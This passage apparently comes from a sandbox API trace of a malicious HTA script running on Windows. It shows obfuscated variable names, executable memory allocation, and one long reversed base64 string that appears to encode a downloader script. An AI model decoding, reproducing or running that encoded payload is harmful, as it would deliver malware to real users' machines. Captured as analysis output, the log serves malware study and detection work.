Flags=0x0, Size=0x14) returned 0x62a7f0 [0132.728] GetCurrentThreadId () returned 0xb48 [0132.728] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.728] GetCurrentThreadId () returned 0xb48 [0132.728] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.729] GetCurrentThreadId () returned 0xb48 [0132.729] GetCurrentThreadId () returned 0xb48 [0132.729] SysStringLen (param_1=0x0) returned 0x0 [0132.729] SysStringLen (param_1="file:///C:/Users/Public/powPowNext.hta") returned 0x26 [0132.730] _wcsicmp (_String1="", _String2="") returned 0 [0132.730] malloc (_Size=0x1510) returned 0xc10938 [0132.730] malloc (_Size=0x74) returned 0xc11e50 [0132.731] malloc (_Size=0x22c) returned 0xc11ed0 [0132.731] malloc (_Size=0x804) returned 0xc12108 [0132.731] malloc (_Size=0x19c) returned 0xc12918 [0132.734] malloc (_Size=0x1004) returned 0xc12ac0 [0132.736] malloc (_Size=0x98) returned 0xc13ad0 [0132.736] wcscpy_s (in: _Destination=0xc12cec, _SizeInWords=0xd, _Source="doorLoadDoor" | out: _Destination="doorLoadDoor") returned 0x0 [0132.736] wcscpy_s (in: _Destination=0xc12d06, _SizeInWords=0x7, _Source="length" | out: _Destination="length") returned 0x0 [0132.737] _ltow_s (in: _Value=0, _Buffer=0xc12988, _BufferCount=0x80, _Radix=10 | out: _Buffer="0") returned 0x0 [0132.737] swprintf_s (in: _Dst=0xc13064, _SizeInWords=0xf, _Format="%s[%s]" | out: _Dst="tubeNextDow[0]") returned 14 [0132.737] _ltow_s (in: _Value=1, _Buffer=0xc12988, _BufferCount=0x80, _Radix=10 | out: _Buffer="1") returned 0x0 [0132.737] swprintf_s (in: _Dst=0xc130b4, _SizeInWords=0xf, _Format="%s[%s]" | out: _Dst="tubeNextDow[1]") returned 14 [0132.737] free (_Block=0xc12918) [0132.738] malloc (_Size=0x90) returned 0xc12918 [0132.742] malloc (_Size=0xa4) returned 0xc129b0 [0132.743] malloc (_Size=0x30) returned 0xc10890 [0132.743] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x203000, flProtect=0x4) returned 0x7580000 [0132.743] malloc (_Size=0x404) returned 0xc13b70 [0132.744] malloc (_Size=0x94) returned 0xc13f80 [0132.744] wcscpy_s (in: _Destination=0x735c060, _SizeInWords=0xd, _Source="likeTubeDoor" | out: _Destination="likeTubeDoor") returned 0x0 [0132.744] wcscpy_s (in: _Destination=0x735c080, _SizeInWords=0xd, _Source="loadLoveLove" | out: _Destination="loadLoveLove") returned 0x0 [0132.744] wcscpy_s (in: _Destination=0x735c0a0, _SizeInWords=0xc, _Source="tubeNextPow" | out: _Destination="tubeNextPow") returned 0x0 [0132.745] wcscpy_s (in: _Destination=0x735c0c0, _SizeInWords=0xb, _Source="dowYouLike" | out: _Destination="dowYouLike") returned 0x0 [0132.745] wcscpy_s (in: _Destination=0x735c0e0, _SizeInWords=0xe, _Source="karolLoadNext" | out: _Destination="karolLoadNext") returned 0x0 [0132.745] wcscpy_s (in: _Destination=0x735c100, _SizeInWords=0xe, _Source="loveNextKarol" | out: _Destination="loveNextKarol") returned 0x0 [0132.745] wcscpy_s (in: _Destination=0x735c120, _SizeInWords=0xe, _Source="karolNextDoor" | out: _Destination="karolNextDoor") returned 0x0 [0132.746] malloc (_Size=0x90) returned 0xc14020 [0132.746] malloc (_Size=0x84) returned 0xc140b8 [0132.746] malloc (_Size=0xc) returned 0xc12a60 [0132.746] malloc (_Size=0xc) returned 0xc12a78 [0132.746] malloc (_Size=0x10) returned 0xc12a90 [0132.747] malloc (_Size=0x30) returned 0xc14148 [0132.747] malloc (_Size=0xc) returned 0xc12aa8 [0132.747] malloc (_Size=0xc) returned 0xc14180 [0132.747] malloc (_Size=0x10) returned 0xc14198 [0132.747] malloc (_Size=0x30) returned 0xc141b0 [0132.747] malloc (_Size=0xc) returned 0xc141e8 [0132.747] malloc (_Size=0xc) returned 0xc14200 [0132.747] malloc (_Size=0x10) returned 0xc14218 [0132.747] malloc (_Size=0x30) returned 0xc14230 [0132.747] malloc (_Size=0xc) returned 0xc14268 [0132.747] malloc (_Size=0xc) returned 0xc143b0 [0132.747] malloc (_Size=0x10) returned 0xc142f0 [0132.748] malloc (_Size=0x28) returned 0xc14488 [0132.748] free (_Block=0xc142f0) [0132.748] malloc (_Size=0x58) returned 0xc144b8 [0132.748] free (_Block=0xc14488) [0132.749] malloc (_Size=0x7c) returned 0xbfd478 [0132.750] malloc (_Size=0x30) returned 0xc14518 [0132.750] malloc (_Size=0xc) returned 0xc142a8 [0132.750] malloc (_Size=0xc) returned 0xc14440 [0132.750] malloc (_Size=0x10) returned 0xc143f8 [0132.750] malloc (_Size=0x30) returned 0xc14550 [0132.750] malloc (_Size=0xc) returned 0xc14308 [0132.750] malloc (_Size=0xc) returned 0xc142d8 [0132.750] malloc (_Size=0x10) returned 0xc14470 [0132.750] malloc (_Size=0x30) returned 0xc14588 [0132.750] malloc (_Size=0xc) returned 0xc14410 [0132.750] malloc (_Size=0xc) returned 0xc142f0 [0132.750] malloc (_Size=0x10) returned 0xc14350 [0132.750] malloc (_Size=0x30) returned 0xc145c0 [0132.751] malloc (_Size=0xc) returned 0xc14368 [0132.751] malloc (_Size=0xc) returned 0xc142c0 [0132.751] malloc (_Size=0x10) returned 0xc14320 [0132.751] malloc (_Size=0x28) returned 0xc14488 [0132.751] free (_Block=0xc14320) [0132.751] malloc (_Size=0xa8) returned 0xc145f8 [0132.751] malloc (_Size=0x80) returned 0xbfd500 [0132.751] malloc (_Size=0xac) returned 0xc146a8 [0132.752] malloc (_Size=0x30) returned 0xc14760 [0132.752] free (_Block=0xc12ac0) [0132.752] free (_Block=0xc12108) [0132.752] free (_Block=0xc11ed0) [0132.752] malloc (_Size=0x20) returned 0xc14798 [0132.752] malloc (_Size=0xc) returned 0xc14458 [0132.752] free (_Block=0xc10938) [0132.752] malloc (_Size=0x18) returned 0xc147c0 [0132.752] malloc (_Size=0xc) returned 0xc14320 [0132.752] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x55ba448f, dwHighDateTime=0x1d7d80b)) [0132.753] GetTickCount () returned 0x1d6c03a [0132.753] GetCurrentThreadId () returned 0xb48 [0132.753] GetTickCount () returned 0x1d6c03a [0132.753] malloc (_Size=0x88) returned 0xc147e0 [0132.754] malloc (_Size=0x30) returned 0xc14a90 [0132.754] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x3000, flProtect=0x4) returned 0x75a0000 [0132.754] VirtualQuery (in: lpAddress=0x75a0000, lpBuffer=0x19f428, dwLength=0x1c | out: lpBuffer=0x19f428*(BaseAddress=0x75a0000, AllocationBase=0x75a0000, AllocationProtect=0x4, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.754] VirtualProtect (in: lpAddress=0x75a0000, dwSize=0x1000, flNewProtect=0x10, lpflOldProtect=0x19f444 | out: lpflOldProtect=0x19f444*=0x4) returned 1 [0132.764] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x75a0000, dwSize=0x1000) returned 1 [0132.764] malloc (_Size=0x74) returned 0xc14c78 [0132.765] malloc (_Size=0xc) returned 0xc14380 [0132.766] GetTickCount () returned 0x1d6c04a [0132.766] GetCurrentThreadId () returned 0xb48 [0132.766] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.766] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.767] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.768] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.768] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.768] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.768] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.769] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.769] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.769] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.769] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.769] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.769] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.770] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.770] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.770] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.770] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.770] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.771] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.771] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.771] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.771] IsCharSpaceW (wch=0x64) returned 0 [0132.771] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.771] IsCharSpaceW (wch=0x64) returned 0 [0132.771] GetTickCount () returned 0x1d6c059 [0132.771] GetCurrentThreadId () returned 0xb48 [0132.772] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.772] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.772] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.772] malloc (_Size=0x78) returned 0xc14cf8 [0132.772] rand_s (in: _RandomValue=0x19ecac | out: _RandomValue=0x19ecac) returned 0x0 [0132.772] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x203000, flProtect=0x4) returned 0x75c0000 [0132.773] malloc (_Size=0x8c) returned 0xc14d78 [0132.773] malloc (_Size=0x2600) returned 0xc14e10 [0132.773] malloc (_Size=0x28) returned 0xc11ed0 [0132.774] GetCurrentThreadId () returned 0xb48 [0132.774] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.774] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.774] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.775] GetCurrentThreadId () returned 0xb48 [0132.775] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.775] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.775] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.775] IsCharSpaceW (wch=0x6c) returned 0 [0132.775] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.775] IsCharSpaceW (wch=0x6c) returned 0 [0132.776] free (_Block=0x0) [0132.776] GetCurrentThreadId () returned 0xb48 [0132.776] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.776] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.776] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.782] IsWindowVisible (hWnd=0x70258) returned 0 [0132.782] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.782] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.782] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.782] IsCharSpaceW (wch=0x67) returned 0 [0132.782] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.783] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.783] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.783] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.783] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.783] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.784] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.784] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x62a5d0 [0132.784] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.784] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.785] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.785] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.785] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.785] memcpy_s (in: _Destination=0xd083c0, _DestinationSize=0xb8, _Source=0x19e380, _SourceSize=0xb8 | out: _Destination=0xd083c0) returned 0x0 [0132.799] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.803] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.803] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.803] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x800) returned 0x647ac0 [0132.803] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x100) returned 0x618488 [0132.803] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x604ce8 [0132.803] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x604cf8 [0132.804] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.805] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x618488, Size=0x800) returned 0x6482c8 [0132.805] memcpy_s (in: _Destination=0x6482c8, _DestinationSize=0x800, _Source=0x647ac0, _SourceSize=0x76e | out: _Destination=0x6482c8) returned 0x0 [0132.805] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x778) returned 0x648ad0 [0132.805] memcpy_s (in: _Destination=0x648ad8, _DestinationSize=0x770, _Source=0x6482c8, _SourceSize=0x770 | out: _Destination=0x648ad8) returned 0x0 [0132.806] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0132.806] GetProcAddress (hModule=0x743f0000, lpProcName=0x4) returned 0x74409c00 [0132.806] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19e40c | out: lpflOldProtect=0x19e40c*=0x4) returned 1 [0132.806] memcpy_s (in: _Destination=0x649254, _DestinationSize=0x770, _Source=0x648ad8, _SourceSize=0x770 | out: _Destination=0x649254) returned 0x0 [0132.807] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x604cf8 | out: hHeap=0x5e0000) returned 1 [0132.807] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x604ce8 | out: hHeap=0x5e0000) returned 1 [0132.807] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x648ad0 | out: hHeap=0x5e0000) returned 1 [0132.807] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62a5d0 | out: hHeap=0x5e0000) returned 1 [0132.807] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x647ac0 | out: hHeap=0x5e0000) returned 1 [0132.807] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6482c8 | out: hHeap=0x5e0000) returned 1 [0132.807] SysStringLen (param_1="2FmcgcWayxGTptWZE92byBSPg4WZ3BSQjRXa2VGWPJmalNGdoISbzhXbsJjL41GboRHdwJSK7cWayxGTptWZE92by5ybwVmboIyRFRlIsAiIoRHdwpzLvMHavVHbkVmclxGbp9Gd0RmLj9WbvI2bvx2avEFbhp0a4MkN2lVcJlXR3JGZ5BnQIZ3M5pkUvcncXdlTDR0L3cDNyczLiVmY5NHO/MWak1jQtlzYBBlJ3BFO6h2aL1TYOx0QzImSDhmWNVzRhVXSCZSPTBTTSN1NyoWc0t2TSh3SBNTaVtmakNlIsAiZhx2cllyOnlmcsxUarVGRv9mcuMXZuRGKpsTamhyZpJHbMl2alR0bvJnLzRXY0V3cg0TPgIDMwkye0JXe7ZXYyByahJ3bsl1b1dUayxGI9AibldHIBNGdpZXZY9kYqV2Y0hiIhR2bkJmLzRnclFWbikyOrFmcvxWWvV3RpJHbu8Gcl52OrFmcvxWWvV3RpJHbuQXewVGI9ASM7sWYy9GbZ9WdHlmcs5ydylGdlhyZpJHbMl2alR0bvJnLyV2cw9mbzVmYvRWepszahJ3bsl1b1dUayxmLzFmdlR3bmlGblhiIjpDXcV3clJ3ccxFc1JGbpNGXcRXdiV2RpJHbM9WYk5iawdmIsAiMpszahJ3bsl1b1dUayxmLjx2bzV2O9NWY0NGaoUWK71Xf|||==gdhJHInlmcsxUarVGTvZXZg0DIuV2dgE0Y0lmdlh1TipWZjRHKic3cjJXawRnLzhWZsxmIpsjdhJHI59WdQ92dUVnYlBSPg4WZ3BSQjRXa2VGWPJmalNGdoIycjJXawRXaudmLmlGblNXezRXZt9mYqV2Y0JSK7cWayxGTptWZM9mdl5ic15GKiIXZnNndyNjMgMmOcxVdzVmczxFXwVnYsl2YcxFd1JWZHlmcsx0bhRmLqB3ZikyO") returned 0x3b7 [0132.807] malloc (_Size=0x84) returned 0xc11f00 [0132.807] malloc (_Size=0x94) returned 0xc11f90 [0132.808] malloc (_Size=0x80) returned 0xbfcf28 [0132.808] malloc (_Size=0xf8) returned 0xc12030 [0132.810] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.810] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.811] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.811] IsCharSpaceW (wch=0x67) returned 0 [0132.811] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.811] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.811] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.811] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.812] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.812] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.812] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.812] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x62a890 [0132.812] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x800) returned 0x647ac0 [0132.812] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x100) returned 0x618488 [0132.812] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x604e18 [0132.812] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x604d38 [0132.812] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.812] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8c) returned 0x618590 [0132.812] memcpy_s (in: _Destination=0x618598, _DestinationSize=0x84, _Source=0x618488, _SourceSize=0x84 | out: _Destination=0x618598) returned 0x0 [0132.812] memcpy_s (in: _Destination=0x61862c, _DestinationSize=0x84, _Source=0x618598, _SourceSize=0x84 | out: _Destination=0x61862c) returned 0x0 [0132.813] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x604d38 | out: hHeap=0x5e0000) returned 1 [0132.813] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x604e18 | out: hHeap=0x5e0000) returned 1 [0132.813] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x618590 | out: hHeap=0x5e0000) returned 1 [0132.813] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62a890 | out: hHeap=0x5e0000) returned 1 [0132.813] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x647ac0 | out: hHeap=0x5e0000) returned 1 [0132.813] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x618488 | out: hHeap=0x5e0000) returned 1 [0132.813] SysStringLen (param_1="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=") returned 0x41 [0132.813] malloc (_Size=0x90) returned 0xc12130 [0132.813] malloc (_Size=0xd0) returned 0xc121c8 [0132.814] malloc (_Size=0xd0) returned 0xc122a0 [0132.814] malloc (_Size=0x80) returned 0xbfd368 [0132.814] malloc (_Size=0x38) returned 0xc12378 [0132.814] malloc (_Size=0x20) returned 0xc123b8 [0132.814] malloc (_Size=0x20) returned 0xc123e0 [0132.814] malloc (_Size=0xa8) returned 0xc12408 [0132.814] SetEvent (hEvent=0x398) returned 1 [0132.814] malloc (_Size=0xd0) returned 0xc124b8 [0132.814] malloc (_Size=0xd0) returned 0xc12590 [0132.814] malloc (_Size=0x7c) returned 0xbfd0c0 [0132.815] malloc (_Size=0xd0) returned 0xc12668 [0132.815] malloc (_Size=0xd0) returned 0xc12740 [0132.815] malloc (_Size=0xd0) returned 0xc12818 [0132.815] malloc (_Size=0x7c) returned 0xbfd3f0 [0132.815] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.815] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.815] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.815] IsCharSpaceW (wch=0x67) returned 0 [0132.816] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.816] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.816] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.816] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.817] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.817] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.817] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0132.817] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x62a830 [0132.817] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x800) returned 0x647ac0 [0132.817] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x100) returned 0x618488 [0132.817] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x604d88 [0132.817] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x604da8 [0132.818] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.818] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8c) returned 0x618590 [0132.818] memcpy_s (in: _Destination=0x618598, _DestinationSize=0x84, _Source=0x618488, _SourceSize=0x84 | out: _Destination=0x618598) returned 0x0 [0132.818] memcpy_s (in: _Destination=0x61862c, _DestinationSize=0x84, _Source=0x618598, _SourceSize=0x84 | out: _Destination=0x61862c) returned 0x0 [0132.818] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x604da8 | out: hHeap=0x5e0000) returned 1 [0132.818] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x604d88 | out: hHeap=0x5e0000) returned 1 [0132.818] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x618590 | out: hHeap=0x5e0000) returned 1 [0132.818] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62a830 | out: hHeap=0x5e0000) returned 1 [0132.818] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x647ac0 | out: hHeap=0x5e0000) returned 1 [0132.819] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x618488 | out: hHeap=0x5e0000) returned 1 [0132.819] SysStringLen (param_1="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=") returned 0x41 [0132.819] malloc (_Size=0xd0) returned 0xc17418 [0132.819] malloc (_Size=0xd0) returned 0xc174f0 [0132.819] malloc (_Size=0x80) returned 0xbfd588 [0132.820] malloc (_Size=0x80) returned 0xbfd610 [0132.820] GetCurrentThreadId () returned 0xb48 [0132.820] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x55c4739b, dwHighDateTime=0x1d7d80b)) [0132.856] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x55c9de7c, dwHighDateTime=0x1d7d80b)) [0132.856] GetTickCount () returned 0x1d6c0a7 [0132.856] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x55c9de7c, dwHighDateTime=0x1d7d80b)) [0132.856] free (_Block=0xc14798) [0132.856] free (_Block=0xc11ed0) [0132.856] GetTickCount () returned 0x1d6c0a7 [0132.856] GetTickCount () returned 0x1d6c0a7 [0132.856] GetCurrentThreadId () returned 0xb48 [0132.856] GetCurrentThreadId () returned 0xb48 [0132.856] GetCurrentThreadId () returned 0xb48 [0132.856] GetCurrentThreadId () returned 0xb48 [0132.856] GetCurrentThreadId () returned 0xb48 [0132.857] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x63eb58 | out: hHeap=0x5e0000) returned 1 [0132.857] GetCurrentThreadId () returned 0xb48 [0132.857] SetEvent (hEvent=0x29c) returned 1 [0132.857] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0132.857] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0132.858] GetProcAddress (hModule=0x76b10000, lpProcName="RegisterDragDrop") returned 0x76b36560 [0132.858] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19fbac | out: lpflOldProtect=0x19fbac*=0x4) returned 1 [0132.859] RegisterDragDrop (hwnd=0x103ba, pDropTarget=0x6e8967cc) returned 0x0 [0133.374] QueryPerformanceCounter (in: lpPerformanceCount=0x19fb98 | out: lpPerformanceCount=0x19fb98*=3095219307471) returned 1 [0133.375] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.375] SetEvent (hEvent=0x304) returned 1 [0133.375] GetCurrentThreadId () returned 0xb48 [0133.376] QueryPerformanceCounter (in: lpPerformanceCount=0xd109e0 | out: lpPerformanceCount=0xd109e0*=3095219536431) returned 1 [0133.376] GetCurrentThreadId () returned 0xb48 [0133.376] GetCurrentThreadId () returned 0xb48 [0133.376] GetCurrentThreadId () returned 0xb48 [0133.378] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.378] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.378] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.378] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.378] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.379] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.379] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0133.380] LoadLibraryExA (lpLibFileName="msls31.dll", hFile=0x0, dwFlags=0x0) returned 0x65d00000 [0133.401] GetProcAddress (hModule=0x65d00000, lpProcName=0x3e) returned 0x65d11360 [0133.402] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19f0fc | out: lpflOldProtect=0x19f0fc*=0x4) returned 1 [0133.405] LsGetRubyLsimethods () returned 0x0 [0133.405] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0133.406] GetProcAddress (hModule=0x65d00000, lpProcName=0x3f) returned 0x65d05480 [0133.406] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19f0fc | out: lpflOldProtect=0x19f0fc*=0x4) returned 1 [0133.406] LsGetTatenakayokoLsimethods () returned 0x0 [0133.406] VirtualProtect (in: 